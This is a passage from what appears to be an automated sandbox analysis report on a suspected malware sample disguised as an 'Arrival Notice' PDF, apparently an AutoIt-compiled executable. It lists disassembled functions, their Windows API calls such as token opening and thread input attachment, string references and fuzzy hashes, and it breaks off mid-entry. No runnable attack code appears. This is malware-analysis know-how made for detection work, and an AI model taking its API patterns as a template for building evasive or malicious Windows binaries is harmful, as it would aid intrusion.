Part of subcall function 0025AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0025AFE3
Part of subcall function 0025AF83: SelectObject.GDI32(?,00000000), ref: 0025AFF2
Part of subcall function 0025AF83: BeginPath.GDI32(?), ref: 0025B009
Part of subcall function 0025AF83: SelectObject.GDI32(?,00000000), ref: 0025B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002AEA8E
LineTo.GDI32(00000000,?,?), ref: 002AEA9B
EndPath.GDI32(00000000), ref: 002AEAAB
StrokePath.GDI32(00000000), ref: 002AEAB9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 1c56614bccdcc3b1b30909269744a85a05153990a26dd0254ffe440c46aa7a79
Instruction ID: 1f071818e37470b9c5f10b72b28964fe6f01de0bcb56a70fc7ab579cd540ca48
Opcode Fuzzy Hash: 1c56614bccdcc3b1b30909269744a85a05153990a26dd0254ffe440c46aa7a79
Instruction Fuzzy Hash: DDF08232006259BBDB139FA8BC0EFCE3F59AF06311F184202FE11610E18BB65562CB99

Function 0027C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0027C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0027C85D
GetCurrentThreadId.KERNEL32 ref: 0027C864
AttachThreadInput.USER32(00000000), ref: 0027C86B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: cb81f653806b9b884e4d8d42ef76995fe35509ae87770906b3edfef1ebc2fb68
Instruction ID: 364d0abcb53e17d7efea67da9dc771289c457105384a3bf48b834ced2d092793
Opcode Fuzzy Hash: cb81f653806b9b884e4d8d42ef76995fe35509ae87770906b3edfef1ebc2fb68
Instruction Fuzzy Hash: EBE03971141228BADB215FA2BC0DEDB7F1CEF067A1F108029B60D84460C6B18590CBE0

Function 0027B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0027B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0027AC9D), ref: 0027B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0027AC9D), ref: 0027B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0027AC9D), ref: 0027B0F1

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 0cee78937166032b1ff481b3e2a35141d14f9332459679cc8d507f9e8ca784b7
Instruction ID: 62a1dcfba6bc64e0682f4a360a61ae34481eb0cd5ea622e669d113f7a4489ce7
Opcode Fuzzy Hash: 0cee78937166032b1ff481b3e2a35141d14f9332459679cc8d507f9e8ca784b7
Instruction Fuzzy Hash: A0E086326012129FD7201FB56C0CF473BA8EF55791F01C838F245D6040DB749402CB60

Function 0025B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0025B496
SetTextColor.GDI32(?,000000FF), ref: 0025B4A0
SetBkMode.GDI32(?,00000001), ref: 0025B4B5
GetStockObject.GDI32(00000005), ref: 0025B4BD
GetWindowDC.USER32(?,00000000), ref: 002BDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 002BDE38
GetPixel.GDI32(00000000,?,00000000), ref: 002BDE51
GetPixel.GDI32(00000000,00000000,?), ref: 002BDE6A
GetPixel.GDI32(00000000,?,?), ref: 002BDE8A
ReleaseDC.USER32(?,00000000), ref: 002BDE95

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 5d4ab11423d8caaddebf96d2dcb2726e47b865c9aad0aa209cad1e6062146db1
Instruction ID: 8aa52821ef7deb49b598ac016f0f0c19706c2a3d616c8d914cf4bf9e3a44737c
Opcode Fuzzy Hash: 5d4ab11423d8caaddebf96d2dcb2726e47b865c9aad0aa209cad1e6062146db1
Instruction Fuzzy Hash: A6E06D31110241AFDF211F74BC0DFD93B11AB11336F04C266FAB9980E1C7B18590CB11

Function 002BB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 002BB29A
GetDC.USER32(00000000), ref: 002BB2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002BB2C3
ReleaseDC.USER32 ref: 002BB2E2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 41f9f447815db07ddb092e918da7ab3b8043d54bffd88c35b5d087b14b5d573d
Instruction ID: 606e6ec7ffb547703dc9060ddeab6b7d7b0e919f77d5f07b8e3ace81bffcab25
Opcode Fuzzy Hash: 41f9f447815db07ddb092e918da7ab3b8043d54bffd88c35b5d087b14b5d573d
Instruction Fuzzy Hash: 99E046B1510204EFDB015F70EC4CA6E7BA8EB4C356F22C82AFC9A8B251CBB49840DF44

Function 0027B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0027B2DF
UnloadUserProfile.USERENV(?,?), ref: 0027B2EB
CloseHandle.KERNEL32(?), ref: 0027B2F4
CloseHandle.KERNEL32(?), ref: 0027B2FC

Part of subcall function 0027AB24: GetProcessHeap.KERNEL32(00000000,?,0027A848), ref: 0027AB2B
Part of subcall function 0027AB24: HeapFree.KERNEL32(00000000), ref: 0027AB32

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 01af6277719726beac807910573cee611a65f0e947640d6a903ea8cd89ad95a7
Instruction ID: f930af0ab7c62afe98dff5b5b79263193a4a36bfeb6de5892365289c1d82e118
Opcode Fuzzy Hash: 01af6277719726beac807910573cee611a65f0e947640d6a903ea8cd89ad95a7
Instruction Fuzzy Hash: 83E0263A104405BBDB016BA5EC0CC59FBA6FF993213509631F629825B5CB32A871EF91

Function 002BB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 002BB2AE
GetDC.USER32(00000000), ref: 002BB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002BB2C3
ReleaseDC.USER32 ref: 002BB2E2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 9aec8eb5bc2a707cc940c7d3caf6fdb6c7f7d9da4a396422529f16469bfd25bb
Instruction ID: 539729984ddbca29a50447c9e17b9ac2e825a47ce9ec036c7235eb45236a5191
Opcode Fuzzy Hash: 9aec8eb5bc2a707cc940c7d3caf6fdb6c7f7d9da4a396422529f16469bfd25bb
Instruction Fuzzy Hash: 24E04FB1500200EFDB005F70EC4CA2D7BA8EB4C355F218425FD5A87251CB759840CF44

Function 0027DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0027DEAA

Strings

Container, xrefs: 0027DE29
AutoIt3GUI, xrefs: 0027DE22

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 203253405baa24d72e969aa4e04b6d329143f464e2f0d0d69e4a5e22f0ddd72a
Instruction ID: 7973d69d30d496412b00277e4d37c696630d0f2e0b05deb69c9a60234bd5a906
Opcode Fuzzy Hash: 203253405baa24d72e969aa4e04b6d329143f464e2f0d0d69e4a5e22f0ddd72a
Instruction Fuzzy Hash: 2F914870620602AFDB24CF64C884F6AB7F5BF49710F14856EF94ACB691DBB1E851CB60

Function 0028290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00282A72

Strings

I/+, xrefs: 0028297F
I/+, xrefs: 002829FC, 00282A64, 00282A12

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcscpy
String ID: I/+$I/+
API String ID: 3048848545-3803121961
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: 6035cb28738c8a40eb0afdaac0dc81982fe6b1532768ff0e9d28044363982d21
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: D241D739921217EACF29FF98C4519FDB7B0EF08310F64505AE881A71D1D7709EAACB90

Function 0025BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0025BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0025BCF3

Strings

@, xrefs: 0025BCE8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 42e62fd9062b9d74339badd4761ca27c86c03f0fdcc50907f0b97895eb8d69b5
Instruction ID: 8f6b5f9774e70839151a1d42c0bb6501c68026962b47ec3b72ea649576642fab
Opcode Fuzzy Hash: 42e62fd9062b9d74339badd4761ca27c86c03f0fdcc50907f0b97895eb8d69b5
Instruction Fuzzy Hash: 06515771418744DBE320AF14D88ABAFBBECFB95355F41485EF5C8411A2DB7084ACCB5A

Function 0028C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 002444ED: __fread_nolock.LIBCMT ref: 0024450B

_wcscmp.LIBCMT ref: 0028C65D
_wcscmp.LIBCMT ref: 0028C670

Strings

FILE, xrefs: 0028C5A5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 42344a59a17537b43b72ecf25126e4e9f6eb8b6d5243d7922b19efab99511c04
Instruction ID: 959ea1b48fb4addd6745eeebc8cc3240216bbcbb86005b9e39a15d907fd59e2a
Opcode Fuzzy Hash: 42344a59a17537b43b72ecf25126e4e9f6eb8b6d5243d7922b19efab99511c04
Instruction Fuzzy Hash: 7241E676A1021ABADF21ABA4CC41FEF77BDEF89700F100079F601E7181D771AA248B60

Function 002AA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 002AA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002AA86F

Strings

', xrefs: 002AA7C3

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 5157ed276f4fdd1e6caaea11142ad1fd9dce9753336f79595a8d088fd03d117f
Instruction ID: fdb58258e0aabee6d468f29ea76a32186b145792d6d3cece1c8a186f4bbb6cb6
Opcode Fuzzy Hash: 5157ed276f4fdd1e6caaea11142ad1fd9dce9753336f79595a8d088fd03d117f
Instruction Fuzzy Hash: 0A410A74E113099FDB54CF64D881BDABBB9FF09300F10016AE905AB381DB75A951CF91

Function 002A975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 002A980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002A984A

Strings

static, xrefs: 002A97AA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: f1889568c1e09fe57fe42bfbceaced889d866df5502c9d0f00e73e3932957852
Instruction ID: f46840fff82c13c7af3183b981bed40153451c429415caeec732dffd894ec611
Opcode Fuzzy Hash: f1889568c1e09fe57fe42bfbceaced889d866df5502c9d0f00e73e3932957852
Instruction Fuzzy Hash: 4D318F71120604AFEB109F35DC80BBB77A9FF5A760F108619F9A9C7190CA35ACA5CB64

Function 00285157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002851C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00285201

Strings

0, xrefs: 002851BF

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 103cddcf872eba29e39477fcb9d874e9014d7ccdd9153a94589d0811b40c8bfc
Instruction ID: eca423cd3a0fb76af04d3994c3de15ec71c1e2ec7b7200f087c549fa0c4c5d42
Opcode Fuzzy Hash: 103cddcf872eba29e39477fcb9d874e9014d7ccdd9153a94589d0811b40c8bfc
Instruction Fuzzy Hash: 71314B39511316DBDB25EF88D844B9EBBF4FF41350F140019ED81A61E0DB709964CB10

Function 0029658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00296608

Strings

AUTOITCALLVARIABLE%d, xrefs: 002965FA
, $, xrefs: 00296648

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 7c00e0e0aeb6b29bdd7d555ddac3a5e247efa7e0855409ec5528c33d41e6cd98
Instruction ID: f26520ac553e22279dd1bba084136c257b76d130cbbe066863dbff9a15590b9e
Opcode Fuzzy Hash: 7c00e0e0aeb6b29bdd7d555ddac3a5e247efa7e0855409ec5528c33d41e6cd98
Instruction Fuzzy Hash: 32218271620218AFCF14EFA4C886EAD77B8AF45740F004469F509AB186DB74EE65CFA1

Function 002A93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002A945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002A9467

Strings

Combobox, xrefs: 002A9429

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2bab712e759b59cb08c5148d5b9d870d732c0abb991e687d72db8ebdc8382aa7
Instruction ID: ef95998b26d08f44bad3c063d283abc3ac0bf6ebb63c24a549964cfdbe8e8cb6
Opcode Fuzzy Hash: 2bab712e759b59cb08c5148d5b9d870d732c0abb991e687d72db8ebdc8382aa7
Instruction Fuzzy Hash: 1B11C871320109BFEF11DF55DC80EBB376EEB4A3A4F104125F91897290DA719CA28B60

Function 002ADA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

GetActiveWindow.USER32 ref: 002ADA7B
EnumChildWindows.USER32(?,002AD75F,00000000), ref: 002ADAF5

Strings

T1), xrefs: 002ADAFB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1)
API String ID: 3814560230-270254240
Opcode ID: eecaafd38b83c9b6931fa993a3807484cc36053e432cf4393b1458d4712b1692
Instruction ID: 7108dd5f2905d123c1f9a5d995e0d93045c25446a9836d2c246d4b2a9351043d
Opcode Fuzzy Hash: eecaafd38b83c9b6931fa993a3807484cc36053e432cf4393b1458d4712b1692
Instruction Fuzzy Hash: FC212C79215205DFC715DF28E860AA6B7E9EF5A320F250619FD6A873E0DB31A810CF60

Function 002A98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0025D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025D1BA
Part of subcall function 0025D17C: GetStockObject.GDI32(00000011), ref: 0025D1CE
Part of subcall function 0025D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025D1D8

GetWindowRect.USER32(00000000,?), ref: 002A9968
GetSysColor.USER32(00000012), ref: 002A9982

Strings

static, xrefs: 002A9945

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 74636916796ffed37de28a1f43188866090aa3485bfbf02bd5a2b262e0c78c40
Instruction ID: 50d34f8bd538a8104e7f53301c6086f221139f1f77b34fe398bd64904693c61c
Opcode Fuzzy Hash: 74636916796ffed37de28a1f43188866090aa3485bfbf02bd5a2b262e0c78c40
Instruction Fuzzy Hash: 7611267252020AAFDB14DFB8CC45EEA7BA8FF09344F014629FD55E2250EB35E861DB60

Function 002A9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

